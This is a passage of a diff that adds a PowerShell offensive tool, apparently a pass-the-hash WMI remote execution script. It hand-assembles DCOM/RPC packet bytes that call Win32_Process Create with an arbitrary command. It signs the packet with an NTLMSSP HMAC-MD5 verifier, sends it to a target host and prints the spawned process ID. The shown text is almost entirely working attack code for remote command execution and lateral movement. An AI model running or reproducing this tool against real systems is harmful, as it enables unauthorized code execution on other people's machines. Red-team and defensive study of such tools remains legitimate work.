[System.BitConverter]::GetBytes($Command.length + 1727) + $stub_length2 = $stub_length2[0,1] + [Byte[]]$stub_length3 = [System.BitConverter]::GetBytes($Command.length + 1713) + $stub_length3 = $stub_length3[0,1] + [Byte[]]$command_length = [System.BitConverter]::GetBytes($Command.length + 93) + $command_length = $command_length[0,1] + [Byte[]]$command_length2 = [System.BitConverter]::GetBytes($Command.length + 16) + $command_length2 = $command_length2[0,1] + [Byte[]]$command_bytes = [System.Text.Encoding]::UTF8.GetBytes($Command) + + if([Bool]!($Command.Length % 2)) + { + $command_bytes += 0x00 + } + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, + 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x57,0x00,0x69,0x00,0x6e,0x00, + 0x33,0x00,0x32,0x00,0x5f,0x00,0x50,0x00,0x72,0x00,0x6f,0x00,0x63, + 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x55,0x73,0x65,0x72, + 0x06,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x63, + 0x00,0x72,0x00,0x65,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + + $stub_length + + 0x00,0x00 + + $stub_length + + 0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0x81,0xa6,0x12, + 0xdc,0x7f,0x73,0xcf,0x11,0x88,0x4d,0x00,0xaa,0x00,0x4b,0x2e,0x24, + 0x12,0xf8,0x90,0x45,0x3a,0x1d,0xd0,0x11,0x89,0x1f,0x00,0xaa,0x00, + 0x4b,0x2e,0x24,0x00,0x00,0x00,0x00 + + $stub_length2 + + 0x00,0x00,0x78,0x56,0x34,0x12 + + $stub_length3 + + 0x00,0x00,0x02,0x53, + 0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x04, + 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x0e,0x00,0x00,0x00,0x00,0x0b, + 0x00,0x00,0x00,0xff,0xff,0x03,0x00,0x00,0x00,0x2a,0x00,0x00,0x00, + 0x15,0x01,0x00,0x00,0x73,0x01,0x00,0x00,0x76,0x02,0x00,0x00,0xd4, + 0x02,0x00,0x00,0xb1,0x03,0x00,0x00,0x15,0xff,0xff,0xff,0xff,0xff, + 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x12,0x04,0x00,0x80,0x00,0x5f, + 0x5f,0x50,0x41,0x52,0x41,0x4d,0x45,0x54,0x45,0x52,0x53,0x00,0x00, + 0x61,0x62,0x73,0x74,0x72,0x61,0x63,0x74,0x00,0x08,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00, + 0x00,0x00,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x4c,0x69,0x6e,0x65, + 0x00,0x00,0x73,0x74,0x72,0x69,0x6e,0x67,0x00,0x08,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00, + 0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00, + 0x00,0x00,0x49,0x6e,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,0x00,0x0a,0x00,0x00, + 0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00,0x00,0x5e,0x00,0x00, + 0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff,0x01,0x00,0x00,0x00,0x94, + 0x00,0x00,0x00,0x00,0x57,0x69,0x6e,0x33,0x32,0x41,0x50,0x49,0x7c, + 0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x61,0x6e,0x64,0x20,0x54, + 0x68,0x72,0x65,0x61,0x64,0x20,0x46,0x75,0x6e,0x63,0x74,0x69,0x6f, + 0x6e,0x73,0x7c,0x6c,0x70,0x43,0x6f,0x6d,0x6d,0x61,0x6e,0x64,0x4c, + 0x69,0x6e,0x65,0x20,0x00,0x00,0x4d,0x61,0x70,0x70,0x69,0x6e,0x67, + 0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x08,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x29,0x00,0x00,0x00, + 0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x37,0x00,0x00,0x00, + 0x5e,0x00,0x00,0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff,0xca,0x00, + 0x00,0x00,0x02,0x08,0x20,0x00,0x00,0x8c,0x00,0x00,0x00,0x00,0x49, + 0x44,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08, + 0x00,0x00,0x00,0x59,0x01,0x00,0x00,0x5e,0x00,0x00,0x00,0x00,0x0b, + 0x00,0x00,0x00,0xff,0xff,0xca,0x00,0x00,0x00,0x02,0x08,0x20,0x00, + 0x00,0x8c,0x00,0x00,0x00,0x11,0x01,0x00,0x00,0x11,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x73,0x74,0x72,0x69,0x6e,0x67,0x00, + 0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x04,0x00,0x00,0x00,0x00,0x43,0x75,0x72,0x72,0x65,0x6e,0x74, + 0x44,0x69,0x72,0x65,0x63,0x74,0x6f,0x72,0x79,0x00,0x00,0x73,0x74, + 0x72,0x69,0x6e,0x67,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x0a,0x00,0x00, + 0x80,0x03,0x08,0x00,0x00,0x00,0x85,0x01,0x00,0x00,0x00,0x49,0x6e, + 0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x1c,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00, + 0x00,0x00,0x85,0x01,0x00,0x00,0xac,0x01,0x00,0x00,0x02,0x0b,0x00, + 0x00,0x00,0xff,0xff,0x01,0x00,0x00,0x00,0xe2,0x01,0x00,0x00,0x00, + 0x57,0x69,0x6e,0x33,0x32,0x41,0x50,0x49,0x7c,0x50,0x72,0x6f,0x63, + 0x65,0x73,0x73,0x20,0x61,0x6e,0x64,0x20,0x54,0x68,0x72,0x65,0x61, + 0x64,0x20,0x46,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x7c,0x43, + 0x72,0x65,0x61,0x74,0x65,0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x7c, + 0x6c,0x70,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x44,0x69,0x72,0x65, + 0x63,0x74,0x6f,0x72,0x79,0x20,0x00,0x00,0x4d,0x61,0x70,0x70,0x69, + 0x6e,0x67,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00,0x08,0x00,0x00, + 0x00,0x01,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x29,0x00, + 0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0x85,0x01, + 0x00,0x00,0xac,0x01,0x00,0x00,0x02,0x0b,0x00,0x00,0x00,0xff,0xff, + 0x2b,0x02,0x00,0x00,0x02,0x08,0x20,0x00,0x00,0xda,0x01,0x00,0x00, + 0x00,0x49,0x44,0x00,0x08,0x00,0x00,0x00,0x01,0x00,0x04,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a,0x00,0x00,0x80, + 0x03,0x08,0x00,0x00,0x00,0xba,0x02,0x00,0x00,0xac,0x01,0x00,0x00, + 0x00,0x0b,0x00,0x00,0x00,0xff,0xff,0x2b,0x02,0x00,0x00,0x02,0x08, + 0x20,0x00,0x00,0xda,0x01,0x00,0x00,0x72,0x02,0x00,0x00,0x11,0x03, + 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x73,0x74,0x72,0x69,0x6e, + 0x67,0x00,0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x50,0x72,0x6f,0x63,0x65, + 0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70,0x49,0x6e,0x66,0x6f, + 0x72,0x6d,0x61,0x74,0x69,0x6f,0x6e,0x00,0x00,0x6f,0x62,0x6a,0x65, + 0x63,0x74,0x00,0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03, + 0x08,0x00,0x00,0x00,0xef,0x02,0x00,0x00,0x00,0x49,0x6e,0x00,0x0d, + 0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x1c,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00, + 0xef,0x02,0x00,0x00,0x16,0x03,0x00,0x00,0x02,0x0b,0x00,0x00,0x00, + 0xff,0xff,0x01,0x00,0x00,0x00,0x4c,0x03,0x00,0x00,0x00,0x57,0x4d, + 0x49,0x7c,0x57,0x69,0x6e,0x33,0x32,0x5f,0x50,0x72,0x6f,0x63,0x65, + 0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70,0x00,0x00,0x4d,0x61, + 0x70,0x70,0x69,0x6e,0x67,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x00, + 0x0d,0x00,0x00,0x00,0x02,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x29,0x00,0x00,0x00,0x0a,0x00,0x00,0x80,0x03,0x08,0x00,0x00, + 0x00,0xef,0x02,0x00,0x00,0x16,0x03,0x00,0x00,0x02,0x0b,0x00,0x00, + 0x00,0xff,0xff,0x66,0x03,0x00,0x00,0x02,0x08,0x20,0x00,0x00,0x44, + 0x03,0x00,0x00,0x00,0x49,0x44,0x00,0x0d,0x00,0x00,0x00,0x02,0x00, + 0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x00,0x00,0x00,0x0a, + 0x00,0x00,0x80,0x03,0x08,0x00,0x00,0x00,0xf5,0x03,0x00,0x00,0x16, + 0x03,0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0xff,0xff,0x66,0x03,0x00, + 0x00,0x02,0x08,0x20,0x00,0x00,0x44,0x03,0x00,0x00,0xad,0x03,0x00, + 0x00,0x11,0x03,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x6f,0x62, + 0x6a,0x65,0x63,0x74,0x3a,0x57,0x69,0x6e,0x33,0x32,0x5f,0x50,0x72, + 0x6f,0x63,0x65,0x73,0x73,0x53,0x74,0x61,0x72,0x74,0x75,0x70 + + (,0x00 * 501) + + $command_length + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x3c,0x0e,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x01 + + $command_length2 + + 0x00,0x80,0x00,0x5f,0x5f,0x50,0x41,0x52,0x41,0x4d,0x45,0x54,0x45, + 0x52,0x53,0x00,0x00 + + $command_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x02,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + } + + } + + $packet_RPC = Get-PacketRPCRequest $request_flags $stub_data.Length 16 $request_auth_padding $request_call_ID $request_context_ID $request_opnum $request_UUID + $packet_NTLMSSP_verifier = Get-PacketNTLMSSPVerifier $request_auth_padding 0x04 $sequence_number + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier + $RPC_signature = $HMAC_MD5.ComputeHash($sequence_number + $RPC + $stub_data + $NTLMSSP_verifier[0..($request_auth_padding + 7)]) + $RPC_signature = $RPC_signature[0..7] + $packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = $RPC_signature + $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier + $WMI_client_send = $RPC + $stub_data + $NTLMSSP_verifier + $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_random_port_stream.Flush() + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + + while ($WMI_client_random_port_stream.DataAvailable) + { + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + Start-Sleep -m $Sleep + } + + $WMI_client_stage = $WMI_client_stage_next + } + + 'Result' + { + + while ($WMI_client_random_port_stream.DataAvailable) + { + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + Start-Sleep -m $Sleep + } + + if($WMI_client_receive[1145] -ne 9) + { + $target_process_ID = DataLength2 1141 $WMI_client_receive + Write-Output "Command executed with process ID $target_process_ID on $target_long" + } + else + { + Write-Output "Process did not start, check your command" + } + + $WMI_client_stage = 'exit' + } + + } + + Start-Sleep -m $Sleep + + } + + $WMI_client_random_port.Close() + $WMI_client_random_port_stream.Close() + } + + $WMI_client.Close() + $WMI_client_stream.Close() + } + +} + +}
\ No newline at end of file |